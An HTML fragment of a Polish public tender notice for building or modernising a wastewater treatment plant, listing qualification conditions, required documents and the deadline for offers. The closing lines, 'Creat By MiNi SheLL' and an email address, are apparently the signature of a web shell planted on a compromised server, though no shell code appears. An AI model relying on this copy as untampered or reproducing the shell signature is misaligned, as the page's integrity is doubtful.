class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">zapewnienie osoby pełniącej funkcję technologa/serwisanta w okresie gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na zasadach określonych w<br/>Rozdziale XV XVa i XIX SWZ, oraz spełniają określone przez Zamawiającego warunki udziału w postępowaniu.<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym<br/>Zamawiający nie stawia warunków w tym zakresie.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów<br/>Zamawiający nie stawia warunków w tym zakresie.<br/>3) sytuacji ekonomicznej lub finansowej<br/>Zamawiający nie stawia warunków w tym zakresie.<br/>4) zdolności technicznej lub zawodowej<br/>• Zamawiający uzna ww warunek za spełniony, jeżeli Wykonawca wykaże, że nie wcześniej niż w okresie ostatnich 5 lat<br/>przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał<br/>należycie co najmniej jedną robotę budowlaną polegającą na budowie, przebudowie, remoncie lub modernizacji<br/>oczyszczalni ścieków o wartości robót budowlanych minimum 3.000.000,00 złotych brutto z podaniem jej rodzaju, wartości,<br/>daty, miejsca wykonania i podmiotu, na rzecz którego robota ta została wykonana oraz załączeniem dowodu określającego<br/>czy ta robota budowlana została wykonana należycie, przy czym dowodem, o którym mowa, są referencje bądź inne<br/>dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z<br/>przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty.<br/>Zamawiający dokona oceny spełnienia warunku w oparciu o złożony przez Wykonawcę - wykaz robót budowlanych.<br/>oraz<br/>• Zamawiający uzna, że ww warunek za spełniony, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował niżej<br/>podanymi osobami:<br/>• jedną osobą posiadającą uprawnienia budowlane do kierowania i nadzorowania robotami budowlanymi bez ograniczeń w<br/>specjalności konstrukcyjno-budowlanej lub odpowiadające im równoważne uprawnienia budowlane wydane na podstawie<br/>wcześniej obowiązujących przepisów, posiadającą co najmniej 5-letnie doświadczenie w kierowaniu robotami budowlanymi<br/>jako kierownik robót/budowy (licząc od daty uzyskania uprawnień) w tym kierowaniu robotami budowlanymi obejmującym<br/>swoim zakresem realizację co najmniej jednego systemu oczyszczalni ścieków,<br/>• jedną osobą posiadającą uprawnienia budowlane do kierowania i nadzorowania robotami budowlanymi bez ograniczeń w<br/>specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń: cieplnych, wentylacyjnych, gazowych, wodociągowych i<br/>kanalizacyjnych lub odpowiadające im równoważne uprawnienia budowlane wydane na podstawie wcześniej<br/>obowiązujących przepisów, posiadającą co najmniej 5-letnie doświadczenie w kierowaniu robotami budowlanymi jako<br/>kierownik robót/budowy (licząc od daty uzyskania uprawnień) w tym kierowaniu robotami budowlanymi obejmującym swoim<br/>zakresem realizację co najmniej jednego systemu oczyszczalni ścieków.<br/>Zamawiający dokona oceny spełnienia warunku w oparciu o złożony przez Wykonawcę - wykaz osób. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli<br/>okres prowadzenia działalności jest krótszy – w tym okresie, wykonał należycie co najmniej jedną robotę budowlaną polegającą na<br/>budowie, przebudowie, remoncie lub modernizacji oczyszczalni ścieków o wartości robót budowlanych minimum 3.000.000,00<br/>złotych brutto wraz z podaniem jej rodzaju, wartości, dat i miejsca wykonania oraz podmiotu, na rzecz którego robota ta została<br/>wykonana oraz załączeniem dowodu określającego, czy ta robota budowlana została wykonana należycie, przy czym dowodem, o<br/>którym mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane zostały wykonane,<br/>a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty.<br/>Uwaga:<br/>a) Wykaz należy sporządzić na druku zgodnie ze wzorem stanowiącym załącznik nr 14 do SWZ – wykaz robót budowlanych.<br/>b) Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót wykonywanych wspólnie z innymi Wykonawcami, wykaz<br/>dotyczy robót, w których wykonaniu Wykonawca ten bezpośrednio uczestniczył.<br/>c) Wartości podane w walutach innych niż wskazane przez Zamawiającego należy przeliczyć wg średniego kursu NBP na dzień<br/>zakończenia wykonywania robót, podając datę i kurs.<br/>d) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokumenty składa ten z Wykonawców, który w<br/>imieniu wszystkich wykazywać będzie spełnianie warunku określonego Rozdziale XX ust. 1 pkt 4 SWZ, lub wykonali wspólnie<br/>(spółka cywilna).<br/>2) Wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie usług, kontroli jakości lub kierowania robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych,<br/>uprawnień, doświadczenia i wykształcenia niezbędnego do wykonywania zamówienia publicznego, a także zakresu wykonywanych<br/>przez nich czynności oraz informacją o podstawie do dysponowania tymi osobami.<br/>UWAGA:<br/>a) Wykaz należy sporządzić na druku zgodnie ze wzorem stanowiącym załącznik nr 15 do SWZ – wykaz osób,<br/>b) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument Wykonawcy składają wspólnie,<br/>c) Wykonawca, który polega na osobach zdolnych do wykonania zamówienia innych podmiotów, niezależnie od charakteru<br/>prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował tymi zasobami<br/>w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu<br/>do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia - załącznik nr 13 do SWZ.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia:<br/>a) przepisy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia,<br/>b) w przypadku, o którym mowa powyżej Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o<br/>udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego i<br/>składają wraz z ofertą pełnomocnictwo,<br/>c) w przypadku wyboru jako najkorzystniejszej oferty Wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego, kopii umowy regulującej<br/>współpracę tych Wykonawców.<br/>d) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy<br/>i wniesienie zabezpieczenia należytego wykonania umowy, jeżeli jest wymagane. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zgodnie z zapisami projektu umowy stanowiącego załącznik do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-04-15 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://gminagronowo.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-04-15 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-05-14</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Formularz ofert, obowiązanie podmiotu udostępniającego zasoby( jeżeli dotyczy), oświadczenie, o którym mowa w art. 117<br/>ust. 4 ustawy Pzp ( jeżeli dotyczy), pełnomocnictwo jeżeli dotyczy.

Creat By MiNi SheLL
Email: jattceo@gmail.com